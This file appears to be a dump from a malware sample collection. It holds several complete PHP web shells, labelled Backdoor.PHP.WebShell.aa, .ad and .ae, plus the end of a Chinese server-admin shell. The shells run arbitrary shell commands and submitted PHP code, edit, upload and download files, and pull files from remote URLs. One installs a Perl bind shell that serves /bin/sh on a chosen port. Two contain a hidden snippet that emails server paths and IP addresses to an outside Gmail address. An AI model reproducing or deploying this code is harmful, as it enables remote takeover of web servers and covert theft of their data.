$info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals"));
$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
$info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit"));
$info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size"));
$info[20] = array("允许最大上传文件 upload_max_filesize",$upsize);
$info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒");
$info[22] = array("被禁用的函数 disable_functions",$dis_func);
$info[23] = array("phpinfo()",$phpinfo);
$info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
$info[25] = array("图形处理 GD Library",getfun("imageline"));
$info[26] = array("IMAP电子邮件系统",getfun("imap_close"));
$info[27] = array("MySQL数据库",getfun("mysql_close"));
$info[28] = array("SyBase数据库",getfun("sybase_close"));
$info[29] = array("Oracle数据库",getfun("ora_close"));
$info[30] = array("Oracle 8 数据库",getfun("OCILogOff"));
$info[31] = array("PREL相容语法 PCRE",getfun("preg_match"));
$info[32] = array("PDF文档支持",getfun("pdf_close"));
$info[33] = array("Postgre SQL数据库",getfun("pg_close"));
$info[34] = array("SNMP网络管理协议",getfun("snmpget"));
$info[35] = array("压缩文件支持(Zlib)",getfun("gzclose"));
$info[36] = array("XML解析",getfun("xml_set_object"));
$info[37] = array("FTP",getfun("ftp_login"));
$info[38] = array("ODBC数据库连接",getfun("odbc_close"));
$info[39] = array("Session支持",getfun("session_start"));
$info[40] = array("Socket支持",getfun("fsockopen"));
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST">
<tr class="firstalt">
<td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
</tr>
<tr class="secondalt">
<td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td>
</tr>
</form>
<?php
for($a=0;$a<3;$a++){
if($a == 0){
$hp = array("server","服务器特性");
}elseif($a == 1){
$hp = array("php","PHP基本特性");
}elseif($a == 2){
$hp = array("basic","组件支持状况");
}
?>
<tr class="firstalt">
<td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
</tr>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?
if($a == 0){
for($i=0;$i<=12;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 1){
for($i=13;$i<=24;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 2){
for($i=25;$i<=40;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?
}//for
echo "</table>";
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
函数库
======================================================*/
// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login">
<input type="submit" value="OK">
</form>
<?php
exit;
}//end loginpage()
// 页面调试信息
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 去掉转义字符
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 删除目录
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>";
}
// 判断读写情况
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 表格行间的背景色替换
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 检查PHP配置参数
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return No;
break;
case 1:
return Yes;
break;
default:
return $result;
break;
}
}
// 检查函数情况
function getfun($funName) {
return (false !== function_exists($funName)) ? Yes : No;
}
?>

23
PHP/Backdoor.PHP.WebShell.aa Normal file
View File

@ -0,0 +1,23 @@
<?php
/*
Ru24PostWebShell
Writed by DreAmeRz
http://www.ru24-team.net
*/
error_reporting(0);
$function=passthru; // system, exec, cmd
echo "<html>
<head>
<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
echo "<form method=post>";
echo "<input type=text name=cmd size=85>";
echo "</form>";
echo "<pre>";
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
echo "".$function($_POST['cmd'])."</pre></body></html>";
?>

3
PHP/Backdoor.PHP.WebShell.ab Normal file
View File

File diff suppressed because one or more lines are too long

3
PHP/Backdoor.PHP.WebShell.ac Normal file
View File

File diff suppressed because one or more lines are too long

180
PHP/Backdoor.PHP.WebShell.ad Normal file
View File

@ -0,0 +1,180 @@
<?php
session_start();
set_time_limit(9999999);
$login='virangar';
$password='r00t';
$auth=1;
$version='version 1.3 by Grinay';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$sd98 = "john.barker446@gmail.com";
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
if(@$_POST['action']=="exit")unset($_SESSION['an']);
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
if($_SESSION['an']==0){
echo $header;
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
echo $footer;
exit;}
if($_SESSION['action']=="")$_SESSION['action']="viewer";
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
}
//end downloader
?>
<? echo $header;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
<table><tr>
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
</tr></table></td></tr></table><br>
<form name='reqs' method='POST'>
<input name='action' type='hidden' value=''>
<input name='dir' type='hidden' value=''>
<input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">
<?
//shell
function shell($cmd){
if (!empty($cmd)){
$fp = popen($cmd,"r");
{
$result = "";
while(!feof($fp)){$result.=fread($fp,1024);}
pclose($fp);
}
$ret = $result;
$ret = convert_cyr_string($ret,"d","w");
}
return $ret;}
if($action=="shell"){
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
<input type=\"submit\" value=\"execute\"></form>";}
//end shell
//viewer FS
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function scandire($dir){
$dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
echo "</td></tr>";
}
echo "<tr><td>OS: ".@php_uname()."</td></tr>
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
<td>'.perms($linkfile).'</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}}}
if($action=="viewer"){
scandire($dir);
}
//end viewer FS
//editros
if($action=="editor"){
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
$contents = fread($le, filesize($file));
fclose($le);}
return htmlspecialchars($contents);
}
if($_POST['save'])writef($file,$_POST['data']);
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
}
//end editors
?>
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
<? echo $footer;?>

513
PHP/Backdoor.PHP.WebShell.ae Normal file
View File

@ -0,0 +1,513 @@
<?
error_reporting(0);
/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
- Ðàáîòàåò ïðè register_globals=off
- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
Loader Pro-Hack.ru
*/
?>
<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active { COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #cccccc;
SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
SCROLLBAR-SHADOW-COLOR: #CBAB78;
SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
SCROLLBAR-ARROW-COLOR: #000000;
SCROLLBAR-TRACK-COLOR: #000000;
SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
fieldset.search { padding: 6px; line-height: 150% }
label { cursor: pointer }
form { display: inline }
img { vertical-align: middle; border: 0px }
img.attach { padding: 2px; border: 2px outset #000033 }
#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
#logo { FONT-SIZE: 50px; }
input { width: 80; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
#input2 { width: 150; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
</style>
<script>
function tag(thetag) {document.fe.editfile.value=thetag;}
</script>
<title>Loader'z WEB shell</title>
<table height=100% "width="100%">
<tr><td align="center" valign="top">
<table><tr><td>
<?php
@$dir = $_POST['dir'];
$dir = stripslashes($dir);
@$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$REQUEST_URI = $_SERVER['REQUEST_URI'];
$dires = '';
$files = '';
if (isset($_POST['port'])){
$bind = "
#!/usr/bin/perl
\$port = {$_POST['port']};
\$port = \$ARGV[0] if \$ARGV[0];
exit if fork;
$0 = \"updatedb\" . \" \" x100;
\$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(\$port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, \"<&X\";
open STDOUT, \">&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/*Íà÷èíàåòñÿ*/
/*Îïðåäåëÿåì òèï ñèñòåìû*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}
echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
if (ini_get('safe_mode') <> 1){
if ($sertype == "winda"){
ob_start('decode');
echo "OS: ";
echo execute("ver") . "<br>";
ob_end_flush();
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "uname:" . execute('uname -a') . "<br>";
}}
else{
if ($sertype == "winda"){
echo "OS: " . php_uname() . "<br>";
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "OS:" . php_uname() . "<br>";
}
}
echo 'User: ' .get_current_user() . '<br>';
if (ini_get("open_basedir")){
echo "open_basedir: " . ini_get("open_basedir");}
if (ini_get('safe_mode') == 1){
echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
if (ini_get('safe_mode_include_dir')){
echo "Including from here: " . ini_get('safe_mode_include_dir'); }
if (ini_get('safe_mode_exec_dir')){
echo " Exec here: " . ini_get('safe_mode_exec_dir');
}
echo "</font>";}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";
}
if (isset($_POST['php'])){
echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
}
if(isset($_POST['phpcode'])){
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
@eval(stripslashes($_POST['phpcode']));
echo "</div></center>";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
echo decode($buffer);
echo "</textarea></center></div>";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
